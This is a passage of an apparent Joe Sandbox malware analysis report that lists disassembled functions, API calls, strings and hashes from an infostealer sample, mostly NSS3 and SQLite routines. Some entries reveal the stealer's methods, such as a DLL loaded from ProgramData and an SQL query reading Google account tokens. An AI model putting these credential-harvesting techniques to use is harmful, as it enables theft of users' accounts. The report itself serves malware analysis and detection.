Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Process$BaseCloseEnumH_prolog3_catch_HandleModuleModulesNameOpen_memset
String ID: <unknown>
API String ID: 445794743-1574992787
Opcode ID: 5fa01872d00487447691a3225bccc3369f15cbd8743e59ae9ff17ec13583b52e
Instruction ID: 2845ab26206ff8cf8ba7188802328d3c4b2a55206999c60f8c3dd29c8819226c
Opcode Fuzzy Hash: 5fa01872d00487447691a3225bccc3369f15cbd8743e59ae9ff17ec13583b52e
Instruction Fuzzy Hash: 82112E7690052CABDB51EF50DC46ADDB6BAAF0A300F4040A5BB08EB251D7705FC58F94

Function 6C4D1C40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 45COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w==l,?,?,6C3D4E1D), ref: 6C4D1C8A
sqlite3_free.NSS3(00000000), ref: 6C4D1CB6

Strings

an index, xrefs: 6C4D1C67
a generated column, xrefs: 6C4D1C6C
non-deterministic use of %s() in %s, xrefs: 6C4D1C85
a CHECK constraint, xrefs: 6C4D1C76, 6C4D1C81
w==l, xrefs: 6C4D1C44

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintf
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w==l
API String ID: 1840970956-2168552355
Opcode ID: 8ce1a1dbbf4566840cf11aa5334f697df1dc4c4f6130b42f15119e59e7f484bc
Instruction ID: 075f46da12ad75c9ba7884ddfe108a6b75325d5ec348507a431f83a5715f7057
Opcode Fuzzy Hash: 8ce1a1dbbf4566840cf11aa5334f697df1dc4c4f6130b42f15119e59e7f484bc
Instruction Fuzzy Hash: 020124B1A042005BE700BB68E852D7273E5EFC634CB15086DEC859BB02EB32E856C752

Function 6C4B4D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C4B4DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4B4DE0

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4B4DCB
misuse, xrefs: 6C4B4DD5
invalid, xrefs: 6C4B4DB8
%s at line %d of [%.10s], xrefs: 6C4B4DDA
API call with %s database connection pointer, xrefs: 6C4B4DBD

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: a0f1d3168db748578e5460261db5580e7fbf0920b062a2f65f9fa9962b21a61a
Instruction ID: 7f9a741ec447f05e5fcc06a442f7b7150d588ce6b6124147fe8dc2ce109e20ba
Opcode Fuzzy Hash: a0f1d3168db748578e5460261db5580e7fbf0920b062a2f65f9fa9962b21a61a
Instruction Fuzzy Hash: D1F0E931F1C6646BEB01D155CC24F87379D8F5239AF461AA0EE087BFD2E22A985182E1

Function 6C4B4DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C4B4E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4B4E4D

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4B4E38
misuse, xrefs: 6C4B4E42
invalid, xrefs: 6C4B4E25
%s at line %d of [%.10s], xrefs: 6C4B4E47
API call with %s database connection pointer, xrefs: 6C4B4E2A

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: f3d4eab6959eccef75f92d206bb0eb1934a772887ce35f7fa4c815da9f47df04
Instruction ID: ce049a30bbe2c02bf351e35b057990daa5a94971456ce2d936f10baae5ae4f35
Opcode Fuzzy Hash: f3d4eab6959eccef75f92d206bb0eb1934a772887ce35f7fa4c815da9f47df04
Instruction Fuzzy Hash: E5F02721E4C9282FFB20D025DC18F8337C64B023AAF0955A1FA0977F92D229987042F2

Function 006190ED Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 006190F2
GetProcAddress.KERNEL32(00000000,connect_to_websocket), ref: 0061910E
GetProcAddress.KERNEL32(free_result), ref: 00619120
FreeLibrary.KERNEL32 ref: 0061913F

Strings

C:\ProgramData\chrome.dll, xrefs: 006190ED
connect_to_websocket, xrefs: 00619108
free_result, xrefs: 00619110

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
API String ID: 2256533930-1545816527
Opcode ID: 5c14cf94a3e324a03585cefa294c5734bd4af8f716f9dd5cb32561a7496eab91
Instruction ID: 2956954aae3d00260dce95c35ca200075cdf2fe1238819a4a359b65d3044bd18
Opcode Fuzzy Hash: 5c14cf94a3e324a03585cefa294c5734bd4af8f716f9dd5cb32561a7496eab91
Instruction Fuzzy Hash: 40F03978911751AFCF005B31AD1D7EA3AE6B709B4BB0404A5E400D62A0EF788880EFA0

Function 0061A632 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 222stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

lstrlenA.KERNEL32(?), ref: 0061A7D7

Part of subcall function 00623A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00628680,?), ref: 00623A93

StrStrA.SHLWAPI(00000000,AccountId), ref: 0061A7F4
lstrlenA.KERNEL32(?,00647862), ref: 0061A8A3
lstrlenA.KERNEL32(?), ref: 0061A8BE

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

Strings

GoogleAccounts, xrefs: 0061A6B5
AccountId, xrefs: 0061A7EE
SELECT service, encrypted_token FROM token_service, xrefs: 0061A746
GoogleAccounts, xrefs: 0061A65E

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$lstrcat$AllocLocal
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 3306365304-1713091031
Opcode ID: cd68b25b6cca5a5667c069fa261392eefcfe19b69ab2500e318f53b641df5c30
Instruction ID: 987d203873f6cbe33aadfa149cb634d6d4a10eb7243a89f2948dff06deec0e1c
Opcode Fuzzy Hash: cd68b25b6cca5a5667c069fa261392eefcfe19b69ab2500e318f53b641df5c30
Instruction Fuzzy Hash: 70811C32E0011AABCF40FBA9ED579DD7776AF04311F550424FA00B7162CB256FA6CB95

Function 6C420C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C421444,?,00000001,?,00000000,00000000,?,?,6C421444,?,?,00000000,?,?), ref: 6C420CB3

Part of subcall function 6C48C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C48C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C421444,?,00000001,?,00000000,00000000,?,?,6C421444,?), ref: 6C420DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C421444,?,00000001,?,00000000,00000000,?,?,6C421444,?), ref: 6C420DEC

Part of subcall function 6C440F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C3E2AF5,?,?,?,?,?,6C3E0A1B,00000000), ref: 6C440F1A
Part of subcall function 6C440F10: malloc.MOZGLUE(00000001), ref: 6C440F30
Part of subcall function 6C440F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C440F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C421444,?,00000001,?,00000000,00000000,?), ref: 6C420DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C421444,?,00000001,?,00000000), ref: 6C420E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C421444,?,00000001,?,00000000,00000000,?), ref: 6C420E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C421444,?,00000001,?,00000000,00000000,?,?,6C421444,?,?,00000000), ref: 6C420E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C421444,?,00000001,?,00000000,00000000,?), ref: 6C420E79

Part of subcall function 6C431560: TlsGetValue.KERNEL32(00000000,?,6C400844,?), ref: 6C43157A
Part of subcall function 6C431560: EnterCriticalSection.KERNEL32(?,?,?,6C400844,?), ref: 6C43158F
Part of subcall function 6C431560: PR_Unlock.NSS3(?,?,?,?,6C400844,?), ref: 6C4315B2

Part of subcall function 6C3FB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C401397,00000000,?,6C3FCF93,5B5F5EC0,00000000,?,6C401397,?), ref: 6C3FB1CB
Part of subcall function 6C3FB1A0: free.MOZGLUE(5B5F5EC0,?,6C3FCF93,5B5F5EC0,00000000,?,6C401397,?), ref: 6C3FB1D2

Part of subcall function 6C3F89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C3F88AE,-00000008), ref: 6C3F8A04
Part of subcall function 6C3F89E0: EnterCriticalSection.KERNEL32(?), ref: 6C3F8A15
Part of subcall function 6C3F89E0: memset.VCRUNTIME140(6C3F88AE,00000000,00000132), ref: 6C3F8A27
Part of subcall function 6C3F89E0: PR_Unlock.NSS3(?), ref: 6C3F8A35

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: ddad290ed3a8e395d1f341287f2d113bdac9cfbb38502fa49761c3a82ad9d7f0
Instruction ID: 774376d68af2269a23fedb4a43c9d15f84aca6fbb0d519dc154022d3e6bd8050
Opcode Fuzzy Hash: ddad290ed3a8e395d1f341287f2d113bdac9cfbb38502fa49761c3a82ad9d7f0
Instruction Fuzzy Hash: 2D51B5B6E012005FEB10DF64DC92EAB37E8AF4525DF150428EC199B712FB35ED1986E2

Function 6C3F9C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 6C3F8850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C400715), ref: 6C3F8859
Part of subcall function 6C3F8850: PR_NewLock.NSS3 ref: 6C3F8874
Part of subcall function 6C3F8850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C3F888D

PR_NewLock.NSS3 ref: 6C3F9CAD

Part of subcall function 6C4A98D0: calloc.MOZGLUE(00000001,00000084,6C3D0936,00000001,?,6C3D102C), ref: 6C4A98E5

Part of subcall function 6C3D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C36204A), ref: 6C3D07AD
Part of subcall function 6C3D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C36204A), ref: 6C3D07CD
Part of subcall function 6C3D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C36204A), ref: 6C3D07D6
Part of subcall function 6C3D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C36204A), ref: 6C3D07E4
Part of subcall function 6C3D07A0: TlsSetValue.KERNEL32(00000000,?,6C36204A), ref: 6C3D0864
Part of subcall function 6C3D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C3D0880
Part of subcall function 6C3D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C36204A), ref: 6C3D08CB
Part of subcall function 6C3D07A0: TlsGetValue.KERNEL32(?,?,6C36204A), ref: 6C3D08D7
Part of subcall function 6C3D07A0: TlsGetValue.KERNEL32(?,?,6C36204A), ref: 6C3D08FB

TlsGetValue.KERNEL32 ref: 6C3F9CE8
EnterCriticalSection.KERNEL32(?,?,6C3FECEC,6C402FCD,00000000,?,6C402FCD,?), ref: 6C3F9D01
TlsGetValue.KERNEL32(?,?,?,6C3FECEC,6C402FCD,00000000,?,6C402FCD,?), ref: 6C3F9D38
EnterCriticalSection.KERNEL32(?,?,6C3FECEC,6C402FCD,00000000,?,6C402FCD,?), ref: 6C3F9D4D
PR_Unlock.NSS3 ref: 6C3F9D70
PR_Unlock.NSS3 ref: 6C3F9DC3
PR_NewLock.NSS3 ref: 6C3F9DDD

Part of subcall function 6C3F88D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C400725,00000000,00000058), ref: 6C3F8906
Part of subcall function 6C3F88D0: EnterCriticalSection.KERNEL32(?), ref: 6C3F891A
Part of subcall function 6C3F88D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C3F894A
Part of subcall function 6C3F88D0: calloc.MOZGLUE(00000001,6C40072D,00000000,00000000,00000000,?,6C400725,00000000,00000058), ref: 6C3F8959
Part of subcall function 6C3F88D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C3F8993
Part of subcall function 6C3F88D0: PR_Unlock.NSS3(?), ref: 6C3F89AF

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
String ID:
API String ID: 3394263606-0
Opcode ID: 48601e8e3aacf0324755ea92fcc234d878906ba3365df4f3f9438e46a947d97b
Instruction ID: 4609e8a9d9a645cefa33df0f0eabe5a2e07dd5b3566e4a09d19d95f24efb75df
Opcode Fuzzy Hash: 48601e8e3aacf0324755ea92fcc234d878906ba3365df4f3f9438e46a947d97b
Instruction Fuzzy Hash: F0519371A017058FDB00EF68C484A5EBBF4BF44308F158929E8A89BB10E731E845CFE2

Function 6C3EDCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C3EDCFA

Part of subcall function 6C4A9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C4F0A27), ref: 6C4A9DC6
Part of subcall function 6C4A9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C4F0A27), ref: 6C4A9DD1
Part of subcall function 6C4A9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C4A9DED

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C3EDD40
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C3EDD62
CERT_DestroyCertificate.NSS3(?), ref: 6C3EDD71
CERT_DestroyCertificate.NSS3(00000000), ref: 6C3EDD81
CERT_RemoveCertListNode.NSS3(?), ref: 6C3EDD8F

Part of subcall function 6C4006A0: TlsGetValue.KERNEL32 ref: 6C4006C2
Part of subcall function 6C4006A0: EnterCriticalSection.KERNEL32(?), ref: 6C4006D6
Part of subcall function 6C4006A0: PR_Unlock.NSS3 ref: 6C4006EB

CERT_DestroyCertificate.NSS3(?), ref: 6C3EDD9E
CERT_DestroyCertificate.NSS3(?), ref: 6C3EDDB7

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
String ID:
API String ID: 653623313-0
Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction ID: 32633bcef3e95a7ef65f3ee11b930d6236e7717fad968572303790f4044e7847
Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction Fuzzy Hash: B5215EB6E012359BDF019E94DC40ADFB7B4AF49218B140426E914A7711F732E915CFE2

Function 6C3E3C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,6C45460B,?,?), ref: 6C3E3CA9
EnterCriticalSection.KERNEL32(?), ref: 6C3E3CB9
PL_HashTableLookup.NSS3(?), ref: 6C3E3CC9
SECITEM_DupItem_Util.NSS3(00000000), ref: 6C3E3CD6
PR_Unlock.NSS3 ref: 6C3E3CE6
CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C3E3CF6
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C3E3D03
PR_Unlock.NSS3 ref: 6C3E3D15

Part of subcall function 6C48DD70: TlsGetValue.KERNEL32 ref: 6C48DD8C
Part of subcall function 6C48DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C48DDB4

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
String ID:
API String ID: 1376842649-0
Opcode ID: 4127a8746c20488636c8f5da71fcf24f531fdf26fb43cd36a27dd830bce52877
Instruction ID: 48659d15f6a5d92a27e9f46397bd1d8c9f698bae91f8383b8464829b33dd1ff1
Opcode Fuzzy Hash: 4127a8746c20488636c8f5da71fcf24f531fdf26fb43cd36a27dd830bce52877
Instruction Fuzzy Hash: 921159B6E01125A7EB117624AC04CAB3AB8EF4635DB164131EC1C83721F722D928CBD1

Function 6C3E9C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4011C0: PR_NewLock.NSS3 ref: 6C401216

free.MOZGLUE(?), ref: 6C3E9E17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3E9E25
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3E9E4E
TlsGetValue.KERNEL32 ref: 6C3E9EA2

Part of subcall function 6C3F9500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C3F9546

EnterCriticalSection.KERNEL32(?), ref: 6C3E9EB6
PR_Unlock.NSS3 ref: 6C3E9ED9
PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C3E9F18

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
String ID:
API String ID: 3381623595-0
